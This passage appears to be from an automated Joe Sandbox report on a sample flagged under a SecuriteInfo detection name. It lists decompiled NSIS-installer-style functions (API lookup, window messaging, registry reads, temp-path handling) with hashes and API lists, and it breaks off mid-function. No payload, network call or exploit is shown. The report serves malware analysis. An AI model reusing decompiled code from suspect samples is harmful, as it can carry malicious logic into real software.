                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 2584051700-0
                                                                                    • Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                                                                    • Instruction ID: b9cc094806d22c325402cb6ccb5f5134c2025175c414775df3ff87de861ccae2
                                                                                    • Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                                                                    • Instruction Fuzzy Hash: 8401B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 70E216BD Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E70E216BD(struct HINSTANCE__* _a4, short* _a8) {
				_Unknown_base(*)()* _t7;
				void* _t10;
				int _t14;

				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
				_t10 = GlobalAlloc(0x40, _t14);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
				_t7 = GetProcAddress(_a4, _t10);
				GlobalFree(_t10);
				return _t7;
			}






                                                                                    0x70e216d7
                                                                                    0x70e216e3
                                                                                    0x70e216f0
                                                                                    0x70e216f7
                                                                                    0x70e21700
                                                                                    0x70e2170c

                                                                                    APIs
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,70E222D8,?,00000808), ref: 70E216D5
                                                                                    • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,70E222D8,?,00000808), ref: 70E216DC
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,70E222D8,?,00000808), ref: 70E216F0
                                                                                    • GetProcAddress.KERNEL32(70E222D8,00000000), ref: 70E216F7
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 70E21700
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.15006371066.0000000070E21000.00000020.00000001.01000000.00000004.sdmp, Offset: 70E20000, based on PE: true
                                                                                    • Associated: 00000001.00000002.15006311880.0000000070E20000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.15006427903.0000000070E24000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.15006474894.0000000070E26000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_70e20000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                    • String ID:
                                                                                    • API String ID: 1148316912-0
                                                                                    • Opcode ID: 83e481a9016d58e841f9acd04b6199048ea1e6973d52daa3911d3f18b298ecce
                                                                                    • Instruction ID: 77ccc7f5e68547c8ddca87dfd733aec723572a5b99fa7e7e2cea07ff27b9f5c8
                                                                                    • Opcode Fuzzy Hash: 83e481a9016d58e841f9acd04b6199048ea1e6973d52daa3911d3f18b298ecce
                                                                                    • Instruction Fuzzy Hash: 02F01CB72065387FD62117A78C4CD9BBE9CDF8B2F5B210211F728921A186A14C46D7F2
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 59%
                                                                                    			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E004065AF();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                                                                                    0x00401c43
                                                                                    0x00401c45
                                                                                    0x00401c4c
                                                                                    0x00401c4f
                                                                                    0x00401c52
                                                                                    0x00401c5c
                                                                                    0x00401c60
                                                                                    0x00401c63
                                                                                    0x00401c6c
                                                                                    0x00401c6c
                                                                                    0x00401c6f
                                                                                    0x00401c73
                                                                                    0x00401c7c
                                                                                    0x00401c7c
                                                                                    0x00401c7f
                                                                                    0x00401c83
                                                                                    0x00401c85
                                                                                    0x00401cda
                                                                                    0x00401cdc
                                                                                    0x00401ce7
                                                                                    0x00401cf1
                                                                                    0x00401cf4
                                                                                    0x00401cf4
                                                                                    0x00401cfd
                                                                                    0x00000000
                                                                                    0x00401c87
                                                                                    0x00401c8e
                                                                                    0x00401c90
                                                                                    0x00401c93
                                                                                    0x00401c99
                                                                                    0x00401ca0
                                                                                    0x00401ca3
                                                                                    0x00401ccb
                                                                                    0x00401d03
                                                                                    0x00401d03
                                                                                    0x00401ca5
                                                                                    0x00401cb3
                                                                                    0x00401cbb
                                                                                    0x00401cbe
                                                                                    0x00401cbe
                                                                                    0x00401ca3
                                                                                    0x00401d06
                                                                                    0x00401d09
                                                                                    0x00401d0f
                                                                                    0x00402ba4
                                                                                    0x00402ba4
                                                                                    0x00402c2d
                                                                                    0x00402c39

                                                                                    APIs
                                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Timeout
                                                                                    • String ID: !
                                                                                    • API String ID: 1777923405-2657877971
                                                                                    • Opcode ID: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                                                    • Instruction ID: e1c20d37316975b9b94706f7b3abd8da4b7b3b5136eece5bd2aa3cbae88a6c19
                                                                                    • Opcode Fuzzy Hash: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                                                    • Instruction Fuzzy Hash: 28219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040603F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 53%
                                                                                    			E0040603F(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E00406668(0x425f50, _a4);
				_t21 = E00405FE2(0x425f50);
				if(_t21 != 0) {
					E004068EF(_t21);
					if(( *0x42a278 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x425f50 >> 1;
						while(1) {
							_t11 = lstrlenW(0x425f50);
							_push(0x425f50);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E0040699E();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405F83(0x425f50);
								continue;
							} else {
								goto L1;
							}
						}
						E00405F37();
						return 0 | GetFileAttributesW(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}








                                                                                    0x0040604b
                                                                                    0x00406056
                                                                                    0x0040605a
                                                                                    0x00406061
                                                                                    0x0040606d
                                                                                    0x0040607d
                                                                                    0x0040607f
                                                                                    0x00406097
                                                                                    0x00406098
                                                                                    0x0040609f
                                                                                    0x004060a0
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406083
                                                                                    0x0040608a
                                                                                    0x00406092
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040608a
                                                                                    0x004060a2
                                                                                    0x00000000
                                                                                    0x004060b6
                                                                                    0x0040606f
                                                                                    0x00406075
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406075
                                                                                    0x0040605c
                                                                                    0x00000000

                                                                                    APIs
                                                                                      • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                                                      • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50, 4!u.!u,?,75212EE0,00405D94,?,75213420,75212EE0,00000000), ref: 00405FF0
                                                                                      • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                                                      • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                                                    • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50, 4!u.!u,?,75212EE0,00405D94,?,75213420,75212EE0,00000000), ref: 00406098
                                                                                    • GetFileAttributesW.KERNEL32(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50, 4!u.!u,?,75212EE0,00405D94,?,75213420,75212EE0), ref: 004060A8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                    • String ID: 4!u.!u$P_B
                                                                                    • API String ID: 3248276644-1332017493
                                                                                    • Opcode ID: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                                                    • Instruction ID: df110f430b83b9381375b5fd3fa67f6c4419d4890c6468873e0fced3c2676832
                                                                                    • Opcode Fuzzy Hash: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                                                    • Instruction Fuzzy Hash: 0DF07826144A1216E622B23A0C05BAF05098F82354B07063FFC93B22E1DF3C8973C43E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00406536 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44registryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 91%
                                                                                    			E00406536(void* __ecx, void* __eflags, char _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t5 =  &_a4; // 0x422728
				_t21 = E004064D5(__eflags,  *_t5, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                                                                                    0x00406544
                                                                                    0x00406546
                                                                                    0x0040655b
                                                                                    0x0040655e
                                                                                    0x00406563
                                                                                    0x00406568
                                                                                    0x004065a6
                                                                                    0x004065a6
                                                                                    0x0040656a
                                                                                    0x0040657c
                                                                                    0x00406587
                                                                                    0x0040658d
                                                                                    0x00406598
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406598
                                                                                    0x004065ac

                                                                                    APIs
                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,0040A230,00000000,('B,00000000,?,?,Call,?,?,0040679D,80000002), ref: 0040657C
                                                                                    • RegCloseKey.ADVAPI32(?,?,0040679D,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,00422728), ref: 00406587
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseQueryValue
                                                                                    • String ID: ('B$Call
                                                                                    • API String ID: 3356406503-2122505255
                                                                                    • Opcode ID: abb8e2472c70d4d58aecb7d0dfcf889930bd109b5a1b9baac0574de2233c5019
                                                                                    • Instruction ID: 52dd0fe420a7c1e2827d1a164217834099ee72e945ce70567094b216899e5676
                                                                                    • Opcode Fuzzy Hash: abb8e2472c70d4d58aecb7d0dfcf889930bd109b5a1b9baac0574de2233c5019
                                                                                    • Instruction Fuzzy Hash: C4017C72500209FADF21CF51DD09EDB3BA8EF54364F01803AFD1AA2190D738D964DBA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00405F37 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 58%
                                                                                    			E00405F37(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}




                                                                                    0x00405f38
                                                                                    0x00405f45
                                                                                    0x00405f46
                                                                                    0x00405f51
                                                                                    0x00405f59
                                                                                    0x00405f59
                                                                                    0x00405f61

                                                                                    APIs
                                                                                    • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F3D
                                                                                    • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F47
                                                                                    • lstrcatW.KERNEL32(?,0040A014), ref: 00405F59
                                                                                    Strings
                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F37
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: CharPrevlstrcatlstrlen
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                    • API String ID: 2659869361-3355392842
                                                                                    • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                    • Instruction ID: 9007417a49851ea4d61da9c71e51c63d156abd36d345156a737e00ee84923012
                                                                                    • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                    • Instruction Fuzzy Hash: 59D05E611019246AC111AB548D04DDB63ACAE85304742046AF601B60A0CB7E196287ED
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 70E210E1 Relevance: 6.4, APIs: 5, Instructions: 145memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 91%
                                                                                    			E70E210E1(signed int _a8, intOrPtr* _a12, void* _a16, void* _a20) {
				void* _v0;
				void* _t27;
				signed int _t29;
				void* _t30;
				void* _t34;
				void* _t36;
				void* _t38;
				void* _t40;
				void* _t48;
				void* _t54;
				void* _t63;
				void* _t64;
				signed int _t66;
				void* _t67;
				void* _t73;
				void* _t74;
				void* _t77;
				void* _t80;
				void _t81;
				void _t82;
				intOrPtr _t84;
				void* _t86;
				void* _t88;

				 *0x70e2506c = _a8;
				 *0x70e25070 = _a16;
				 *0x70e25074 = _a12;
				_a12( *0x70e25048, E70E21651, _t73);
				_t66 =  *0x70e2506c +  *0x70e2506c * 4 << 3;
				_t27 = E70E212E3();
				_v0 = _t27;
				_t74 = _t27;
				if( *_t27 == 0) {
					L28:
					return GlobalFree(_t27);
				}
				do {
					_t29 =  *_t74 & 0x0000ffff;
					_t67 = 2;
					_t74 = _t74 + _t67;
					_t88 = _t29 - 0x66;
					if(_t88 > 0) {
						_t30 = _t29 - 0x6c;
						if(_t30 == 0) {
							L23:
							_t31 =  *0x70e25040;
							if( *0x70e25040 == 0) {
								goto L26;
							}
							E70E21603( *0x70e25074, _t31 + 4, _t66);
							_t34 =  *0x70e25040;
							_t86 = _t86 + 0xc;
							 *0x70e25040 =  *_t34;
							L25:
							GlobalFree(_t34);
							goto L26;
						}
						_t36 = _t30 - 4;
						if(_t36 == 0) {
							L13:
							_t38 = ( *_t74 & 0x0000ffff) - 0x30;
							_t74 = _t74 + _t67;
							_t34 = E70E21312(E70E2135A(_t38));
							L14:
							goto L25;
						}
						_t40 = _t36 - _t67;
						if(_t40 == 0) {
							L11:
							_t80 = ( *_t74 & 0x0000ffff) - 0x30;
							_t74 = _t74 + _t67;
							_t34 = E70E21381(_t80, E70E212E3());
							goto L14;
						}
						L8:
						if(_t40 == 1) {
							_t81 = GlobalAlloc(0x40, _t66 + 4);
							_t10 = _t81 + 4; // 0x4
							E70E21603(_t10,  *0x70e25074, _t66);
							_t86 = _t86 + 0xc;
							 *_t81 =  *0x70e25040;
							 *0x70e25040 = _t81;
						}
						goto L26;
					}
					if(_t88 == 0) {
						_t48 =  *0x70e25070;
						_t77 =  *_t48;
						 *_t48 =  *_t77;
						_t49 = _v0;
						_t84 =  *((intOrPtr*)(_v0 + 0xc));
						if( *((short*)(_t77 + 4)) == 0x2691) {
							E70E21603(_t49, _t77 + 8, 0x38);
							_t86 = _t86 + 0xc;
						}
						 *((intOrPtr*)( *_a12 + 0xc)) = _t84;
						GlobalFree(_t77);
						goto L26;
					}
					_t54 = _t29 - 0x46;
					if(_t54 == 0) {
						_t82 = GlobalAlloc(0x40,  *0x70e2506c +  *0x70e2506c + 8);
						 *((intOrPtr*)(_t82 + 4)) = 0x2691;
						_t14 = _t82 + 8; // 0x8
						E70E21603(_t14, _v0, 0x38);
						_t86 = _t86 + 0xc;
						 *_t82 =  *( *0x70e25070);
						 *( *0x70e25070) = _t82;
						goto L26;
					}
					_t63 = _t54 - 6;
					if(_t63 == 0) {
						goto L23;
					}
					_t64 = _t63 - 4;
					if(_t64 == 0) {
						 *_t74 =  *_t74 + 0xa;
						goto L13;
					}
					_t40 = _t64 - _t67;
					if(_t40 == 0) {
						 *_t74 =  *_t74 + 0xa;
						goto L11;
					}
					goto L8;
					L26:
				} while ( *_t74 != 0);
				_t27 = _v0;
				goto L28;
			}


























                                                                                    0x70e210eb
                                                                                    0x70e21100
                                                                                    0x70e21109
                                                                                    0x70e2110e
                                                                                    0x70e21119
                                                                                    0x70e2111c
                                                                                    0x70e21125
                                                                                    0x70e21129
                                                                                    0x70e2112b
                                                                                    0x70e212b0
                                                                                    0x70e212ba
                                                                                    0x70e212ba
                                                                                    0x70e21132
                                                                                    0x70e21132
                                                                                    0x70e21137
                                                                                    0x70e21138
                                                                                    0x70e2113a
                                                                                    0x70e2113d
                                                                                    0x70e21256
                                                                                    0x70e21259
                                                                                    0x70e21271
                                                                                    0x70e21271
                                                                                    0x70e21278
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e21285
                                                                                    0x70e2128a
                                                                                    0x70e2128f
                                                                                    0x70e21294
                                                                                    0x70e2129a
                                                                                    0x70e2129b
                                                                                    0x00000000
                                                                                    0x70e2129b
                                                                                    0x70e2125b
                                                                                    0x70e2125e
                                                                                    0x70e211bc
                                                                                    0x70e211bf
                                                                                    0x70e211c2
                                                                                    0x70e211cb
                                                                                    0x70e211d0
                                                                                    0x00000000
                                                                                    0x70e211d1
                                                                                    0x70e21264
                                                                                    0x70e21266
                                                                                    0x70e211a2
                                                                                    0x70e211a5
                                                                                    0x70e211a8
                                                                                    0x70e211b1
                                                                                    0x00000000
                                                                                    0x70e211b1
                                                                                    0x70e21164
                                                                                    0x70e21165
                                                                                    0x70e21177
                                                                                    0x70e21180
                                                                                    0x70e21184
                                                                                    0x70e2118e
                                                                                    0x70e21191
                                                                                    0x70e21193
                                                                                    0x70e21193
                                                                                    0x00000000
                                                                                    0x70e21165
                                                                                    0x70e21143
                                                                                    0x70e21218
                                                                                    0x70e2121d
                                                                                    0x70e21221
                                                                                    0x70e21223
                                                                                    0x70e2122c
                                                                                    0x70e2122f
                                                                                    0x70e21238
                                                                                    0x70e2123d
                                                                                    0x70e2123d
                                                                                    0x70e21247
                                                                                    0x70e2124a
                                                                                    0x00000000
                                                                                    0x70e21250
                                                                                    0x70e21149
                                                                                    0x70e2114c
                                                                                    0x70e211e9
                                                                                    0x70e211ed
                                                                                    0x70e211f7
                                                                                    0x70e211fb
                                                                                    0x70e21205
                                                                                    0x70e2120a
                                                                                    0x70e21211
                                                                                    0x00000000
                                                                                    0x70e21211
                                                                                    0x70e21152
                                                                                    0x70e21155
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e2115b
                                                                                    0x70e2115e
                                                                                    0x70e211b8
                                                                                    0x00000000
                                                                                    0x70e211b8
                                                                                    0x70e21160
                                                                                    0x70e21162
                                                                                    0x70e2119e
                                                                                    0x00000000
                                                                                    0x70e2119e
                                                                                    0x00000000
                                                                                    0x70e212a1
                                                                                    0x70e212a1
                                                                                    0x70e212ab
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 70E21171
                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 70E211E3
                                                                                    • GlobalFree.KERNEL32 ref: 70E2124A
                                                                                    • GlobalFree.KERNEL32(?), ref: 70E2129B
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 70E212B1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.15006371066.0000000070E21000.00000020.00000001.01000000.00000004.sdmp, Offset: 70E20000, based on PE: true
                                                                                    • Associated: 00000001.00000002.15006311880.0000000070E20000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.15006427903.0000000070E24000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.15006474894.0000000070E26000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_70e20000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$Free$Alloc
                                                                                    • String ID:
                                                                                    • API String ID: 1780285237-0
                                                                                    • Opcode ID: 6367f008d12bf4489d3ea4d46991f19e3a45d3767ec558deefc15e7a67aab566
                                                                                    • Instruction ID: 449de2a6f1c79fb21b6758ec3e426d8f970ac3da35b91c32cd0dc91f8a6ccc61
                                                                                    • Opcode Fuzzy Hash: 6367f008d12bf4489d3ea4d46991f19e3a45d3767ec558deefc15e7a67aab566
                                                                                    • Instruction Fuzzy Hash: D5517BBB901A01DFD700CF69ED44E2E77ECFB18316B244199F946DB321EB70AA169B50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040263E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 92%
                                                                                    			E0040263E(void* __ebx, void* __edx, intOrPtr* __edi) {
				signed int _t14;
				int _t17;
				void* _t24;
				intOrPtr* _t29;
				void* _t31;
				signed int _t32;
				void* _t35;
				void* _t40;
				signed int _t42;

				_t29 = __edi;
				_t24 = __ebx;
				_t14 =  *(_t35 - 0x28);
				_t40 = __edx - 0x38;
				 *(_t35 - 0x10) = _t14;
				_t27 = 0 | _t40 == 0x00000000;
				_t32 = _t40 == 0;
